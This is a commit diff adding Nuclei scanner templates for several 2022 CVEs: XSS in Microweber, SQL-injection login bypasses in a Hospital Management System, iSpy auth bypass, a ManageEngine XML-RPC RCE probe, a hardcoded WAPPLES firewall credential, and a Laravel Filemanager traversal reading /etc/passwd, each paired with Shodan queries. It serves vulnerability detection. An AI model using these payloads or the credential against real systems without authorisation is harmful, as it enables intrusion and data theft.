up PoCs 2022-09-16

Author: hktalent

config/nuclei-templates/cves/2022/CVE-2022-0678.yaml

@@ -0,0 +1,45 @@
+id: CVE-2022-0678
+
+info:
+  name: Microweber < 1.2.11- Cross-Site Scripting
+  author: tess
+  severity: medium
+  description: |
+    Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
+  reference:
+    - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
+    - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
+    - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0678
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.favicon.hash:780351152
+    verified: "true"
+  tags: huntr,cve,cve2022,xss,microweber
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '><script>alert(document.domain)</script>'
+          - 'content="Microweber"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 404

config/nuclei-templates/cves/2022/CVE-2022-29775.yaml

@@ -0,0 +1,46 @@
+id: CVE-2022-29775
+
+info:
+  name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
+  author: arafatansari
+  severity: critical
+  description: |
+    iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
+  reference:
+    - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
+    - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29775
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29775
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"iSpy is running"
+    verified: "true"
+  tags: cve,cve2022,ispy,auth-bypass
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/logfile?d=crossdomain.xml'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Log Start'
+          - 'Log File'
+          - 'iSpy'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-32094.yaml

@@ -0,0 +1,45 @@
+id: CVE-2022-32094
+
+info:
+  name: Hospital Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: critical
+  description: |
+    Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/doctor.php.
+  reference:
+    - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32094
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-32094
+    cwe-id: CWE-89
+  metadata:
+    shodan-query: http.html:"Hospital Management System"
+    verified: "true"
+  tags: cve,cve2022,hms,cms,sqli,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /hms/doctor/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Doctor  | Dashboard</title>'
+          - 'View Appointment History'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-34590.yaml

@@ -0,0 +1,46 @@
+id: CVE-2022-34590
+
+info:
+  name: Hospital Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.
+  reference:
+    - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34590
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-34590
+    cwe-id: CWE-89
+  metadata:
+    shodan-query: http.html:"Hospital Management System"
+    verified: "true"
+  tags: cve,cve2022,hms,cms,sqli
+
+requests:
+  - raw:
+      - |
+        POST /hms/admin/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Admin  | Dashboard</title>'
+          - 'Manage Patients'
+          - 'Manage Doctors'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-35405.yaml

@@ -1,58 +1,54 @@
 id: CVE-2022-35405
 
 info:
-  name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
-  author: true13
+  name: Zoho ManageEngine Password Manager Pro and PAM 360 - Unauthenticated Remote Command Execution
+  author: viniciuspereiras,true13
   severity: critical
   description: |
-    This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
+    This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro, PAM360 and Access Manager Plus (Authenticated).
   reference:
     - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
     - https://xz.aliyun.com/t/11578
     - https://nvd.nist.gov/vuln/detail/CVE-2022-35405
     - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
+    - https://www.bigous.me/2022/09/06/CVE-2022-35405.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-35405
   metadata:
-    shodan-query: http.title:"ManageEngine Password"
+    shodan-query: http.title:"ManageEngine"
   tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
 
 requests:
   - raw:
       - |
         POST /xmlrpc HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: text/xml
-
-        <?xml version="1.0"?>
-        <methodCall>
-          <methodName>ProjectDiscovery</methodName>
-          <params>
-            <param>
-              <value>
-                <struct>
-                  <member>
-                    <name>test</name>
-                    <value>
-                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
-                    </value>
-                  </member>
-                </struct>
-              </value>
-            </param>
-          </params>
-        </methodCall>
-
-    matchers-condition: and
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
+
+      - |
+        POST /xmlrpc HTTP/1.1
+        Host: {{Host}}:7272
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
+      - |
+        POST /xmlrpc HTTP/1.1
+        Host: {{Host}}:8282
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
+      - |
+        POST /xmlrpc HTTP/1.1
+        Host: {{Host}}:9292
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
+
     matchers:
       - type: word
         part: body
         words:
-          - "Failed to read result object: null"
-
-      - type: word
-        part: header
-        words:
-          - text/xml
+          - "faultString"
+          - "No such service [ProjectDiscovery]"
+          - "methodResponse"
+        condition: or

config/nuclei-templates/cves/2022/CVE-2022-35413.yaml

@@ -0,0 +1,50 @@
+id: CVE-2022-35413
+
+info:
+  name: Wapples Web Application Firewall - Hardcoded credentials
+  author: For3stCo1d
+  severity: critical
+  description: |
+    WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001.
+  reference:
+    - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
+    - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
+  metadata:
+    shodan-query: http.title:"Intelligent WAPPLES"
+    verified: "true"
+  tags: cve,cve2022,wapples,firewall,default-login
+
+requests:
+  - raw:
+      - |
+        POST /webapi/auth HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id={{username}}&password={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - systemi
+      password:
+        - db/wp.no1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"res_msg":"Authentication Success."'
+          - '"doc_id":"user_systemi"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - WP_SESSID=
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-38637.yaml

@@ -0,0 +1,43 @@
+id: CVE-2022-38637
+
+info:
+  name: Hospital Management System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php.
+  reference:
+    - https://www.youtube.com/watch?v=m8nW0p69UHU
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38637
+    - https://owasp.org/www-community/attacks/SQL_Injection
+  classification:
+    cve-id: CVE-2022-38637
+  metadata:
+    shodan-query: http.html:"Hospital Management System"
+    verified: "true"
+  tags: cve,cve2022,hms,cms,sqli,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>User  | Dashboard</title>'
+          - 'Book My Appointment'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-40734.yaml

@@ -0,0 +1,29 @@
+id: CVE-2022-40734
+
+info:
+  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
+  author: arafatansari
+  severity: high
+  description: |
+    UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
+  reference:
+    - https://github.com/UniSharp/laravel-filemanager/issues/1150
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
+  classification:
+    cve-id: CVE-2022-40734
+  metadata:
+    verified: true
+    shodan-query: http.html:"Laravel Filemanager"
+  tags: cve,cve2022,laravel,unisharp,lfi,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+
+    stop-at-first-match: true
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"